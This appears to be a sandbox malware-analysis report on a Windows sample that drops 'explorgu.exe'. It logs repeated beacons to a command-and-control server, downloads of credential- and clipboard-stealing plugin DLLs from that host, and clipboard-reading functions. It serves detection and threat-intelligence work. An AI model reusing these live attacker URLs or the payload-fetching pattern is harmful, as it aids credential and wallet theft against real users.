Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.32 185.215.113.32
Source: Joe Sandbox View	IP Address: 185.215.113.32 185.215.113.32

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_004EC990 recv,recv,recv,recv,

0_2_004EC990

Source: global traffic	HTTP traffic detected: GET /yandex/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.32
Source: global traffic	HTTP traffic detected: GET /yandex/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.32

Source: unknown

HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/ws
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll&
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll1
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/cred64.dll
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/cred64.dll2
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000332A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php%
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php2ab05
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php:10
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1&
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1r
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1tesf
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpK
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpVl
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpWindows
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpa
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpa0
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpa2ab05
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpg
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpn
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpp
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phprsion
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpu
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpx
Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000B.00000002.2031780544.000002004893F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.2050170977.000002005F3BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E222580 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__ehhandler$___std_fs_get_file_id@8,__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z,__ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,__ehhandler$___std_fs_get_file_id@8,

10_2_6E222580

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\rundll32.exe

10_2_6E222580

System Summary

PE file contains section with special chars

Source: wIaKimJFke.exe	Static PE information: section name:
Source: wIaKimJFke.exe	Static PE information: section name: .idata
Source: wIaKimJFke.exe	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: .idata
Source: explorgu.exe.0.dr	Static PE information: section name:

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Process Stats: CPU usage > 49%

Creates files inside the system directory

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File created: C:\Windows\Tasks\explorgu.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_0052707B	0_2_0052707B
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00526809	0_2_00526809
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_005224D0	0_2_005224D0
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_004E60E0	0_2_004E60E0
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00522968	0_2_00522968
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00527EB0	0_2_00527EB0
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00526F5B	0_2_00526F5B
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00517780	0_2_00517780
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E6809	5_2_002E6809
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E707B	5_2_002E707B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E24D0	5_2_002E24D0
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E2968	5_2_002E2968
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E7EB0	5_2_002E7EB0
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E6F5B	5_2_002E6F5B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002D7780	5_2_002D7780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E222580	10_2_6E222580
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E231701	10_2_6E231701
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B7177F8	11_2_00007FFD9B7177F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B7D7732	11_2_00007FFD9B7D7732

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 6E2269A0 appears 34 times

Tries to load missing DLLs

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: apphelp.dll	Jump to behavior
